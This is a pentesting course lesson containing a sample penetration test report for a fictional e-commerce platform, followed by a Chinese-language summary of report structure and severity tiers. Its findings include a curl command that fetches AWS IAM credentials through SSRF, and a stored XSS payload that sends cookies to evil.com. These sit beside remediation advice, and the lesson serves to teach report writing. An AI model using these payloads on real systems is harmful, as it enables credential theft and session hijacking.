Advanced Pentest Report
🔥 Vibe Prompt
"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."
Report Template
# Penetration Test Report: Target Application
## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters
### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF → Cloud metadata → IAM keys
- CVSS average: 7.8/10
### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3 |
| High | 4 |
| Medium | 3 |
| Low | 2 |
## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)
## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool
## 4. Findings Detail
### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint doesn't validate URLs.
Attacker can access AWS metadata service.
**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
Impact: Full AWS credential compromise → data breach
Recommendation:
- Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
- Use an allowlist of approved URLs
- Remove the feature or restrict to specific domains
HIGH: Stored XSS (CVSS 6.8)
Location: User profile name field Description: Name field not sanitized. Stored XSS in profile.
Reproduction:
POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}
Impact: Session hijacking, admin account takeover
Recommendation:
- Sanitize all user input (bleach, DOMPurify)
- Implement Content-Security-Policy
- Use HttpOnly cookies
5. Attack Chain Walkthrough
1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata → retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets → customer data exposed
4. [Auth] Weak JWT secret → forged admin token
5. [Impact] Full admin access to customer DB
Total time: 4 hours (automated + manual)
6. Risk Matrix
┌─────────────────────────────────────────────┐
│ Impact \ Likelihood | Low | Med | High │
├─────────────────────────────────────────────┤
│ Critical | 0 | 1 | 2 │
│ High | 1 | 2 | 1 │
│ Medium | 2 | 1 | 0 │
│ Low | 2 | 0 | 0 │
└─────────────────────────────────────────────┘
7. Recommendations by Priority
P0 (Immediate):
- Fix SSRF (block private IPs)
- Rotate all IAM keys
- Implement WAF (Cloudflare)
P1 (This sprint):
- Sanitize all user inputs (XSS)
- Change JWT secret to 256-bit random
- Rate limit login endpoint
P2 (Next sprint):
- Implement CSP headers
- Add security headers (HSTS, X-Frame-Options)
- Move secrets to AWS Secrets Manager
P3 (Backlog):
- Regular dependency scanning
- Bug bounty program
- Security training for developers
8. Tools Used
| Tool | Purpose | |------|---------| | Burp Suite Pro | Web proxy, scanner | | Nmap | Network scanning | | Gobuster | Directory brute force | | Frida | Mobile runtime | | Nessus | Vulnerability scanning | | Metasploit | Exploitation | | Custom Python scripts | Business logic testing |
PenTesting Advanced Course Complete! 🎉
- ✅ Recon & OSINT
- ✅ Exploit Development
- ✅ Web Exploitation
- ✅ Mobile & API
- ✅ Report Writing
## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |
## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest
---
---
## 滲透測試報告:從發現漏洞到推動修復
一個漏洞如果沒有被記錄下來,它就等於不存在。滲透測試報告是你工作的最終產出——它決定了你的發現能否被重視、能否被修復。
### 一份專業報告該有的結構
- 執行摘要(Executive Summary)
- 給老闆看的:風險總覽、商業影響、統計數據
- 技術細節(Technical Details)
- 給工程師看的:漏洞複現步驟、PoC 程式碼
- 風險評級(Risk Rating)
- CVSS 分數 + 影響範圍 + 利用難度
- 修復建議(Remediation)
- 明確的修補步驟、參考資源
- 附錄(Appendix)
- 掃描工具報表、使用工具清單
### 漏洞風險分級
| 等級 | CVSS 分數 | 說明 | 修復期限 |
|:----|:--------|:----|:--------|
| **Critical** | 9.0-10.0 | 可直接取得伺服器控制權 | 24 小時 |
| **High** | 7.0-8.9 | 可讀取敏感資料 | 7 天 |
| **Medium** | 4.0-6.9 | 資訊洩漏或有限影響 | 30 天 |
| **Low** | 0.1-3.9 | 資訊蒐集或理論風險 | 90 天 |
### 課程總結
這堂滲透測試進階課程你學到了:從漏洞利用開發、Web 漏洞、行動裝置/API 測試到專業報告寫作。你現在具備了執行完整滲透測試的能力——從發現漏洞到推動修復的完整流程。